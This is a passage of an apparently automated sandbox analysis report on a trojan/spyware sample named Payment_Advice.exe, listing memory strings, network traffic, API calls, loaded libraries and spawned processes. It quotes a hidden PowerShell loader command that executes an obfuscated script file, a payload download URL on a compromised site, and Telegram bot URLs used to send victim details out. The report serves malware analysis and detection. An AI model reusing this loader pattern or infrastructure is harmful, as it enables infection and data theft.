Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: wab.exe, 00000005.00000002.3285487324.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\Payment_Advice.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment_Advice.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Payment_Advice.exe

Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_00403358

Source: C:\Users\user\Desktop\Payment_Advice.exe

File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04E5EAD8	2_2_04E5EAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04E5F3A8	2_2_04E5F3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04E5E790	2_2_04E5E790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0799C4D6	2_2_0799C4D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028B5362	5_2_028B5362
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BA088	5_2_028BA088
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BC146	5_2_028BC146
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BC738	5_2_028BC738
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BC468	5_2_028BC468
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BD599	5_2_028BD599
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BCA08	5_2_028BCA08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BF804	5_2_028BF804
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BCFAB	5_2_028BCFAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028B6FC8	5_2_028B6FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BCCD8	5_2_028BCCD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BEC18	5_2_028BEC18
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028B39EE	5_2_028B39EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028B29EC	5_2_028B29EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028B3E09	5_2_028B3E09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BEC0B	5_2_028BEC0B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028BFC50	5_2_028BFC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_05BD2660	5_2_05BD2660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_05BD55E0	5_2_05BD55E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_05BDBF40	5_2_05BDBF40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_05BD39BC	5_2_05BD39BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24492970	5_2_24492970
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24492288	5_2_24492288
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24495290	5_2_24495290
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24491BA8	5_2_24491BA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_244997B0	5_2_244997B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24490040	5_2_24490040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449E068	5_2_2449E068
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449E067	5_2_2449E067
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449DC01	5_2_2449DC01
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449DC10	5_2_2449DC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449003F	5_2_2449003F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449E4C0	5_2_2449E4C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449E4BF	5_2_2449E4BF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24492963	5_2_24492963
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449ED70	5_2_2449ED70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449E918	5_2_2449E918
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449E917	5_2_2449E917
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449F1C8	5_2_2449F1C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24498DF9	5_2_24498DF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24499590	5_2_24499590
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449F1B9	5_2_2449F1B9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24499E46	5_2_24499E46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449FA78	5_2_2449FA78
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24492278	5_2_24492278
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24498E08	5_2_24498E08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449F620	5_2_2449F620
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24499ED8	5_2_24499ED8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24495283	5_2_24495283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449D360	5_2_2449D360
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449CF08	5_2_2449CF08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24490B28	5_2_24490B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24490B30	5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_24491B97	5_2_24491B97
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_2449D7B8	5_2_2449D7B8

Source: Payment_Advice.exe

Static PE information: invalid certificate

Source: Payment_Advice.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/11@5/5

Source: C:\Users\user\Desktop\Payment_Advice.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\Payment_Advice.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03

Source: C:\Users\user\Desktop\Payment_Advice.exe

File created: C:\Users\user\AppData\Local\Temp\nspC30D.tmp

Jump to behavior

Source: Payment_Advice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\Payment_Advice.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Payment_Advice.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\Payment_Advice.exe

File read: C:\Users\user\Desktop\Payment_Advice.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
Source: C:\Users\user\Desktop\Payment_Advice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Users\user\Desktop\Payment_Advice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
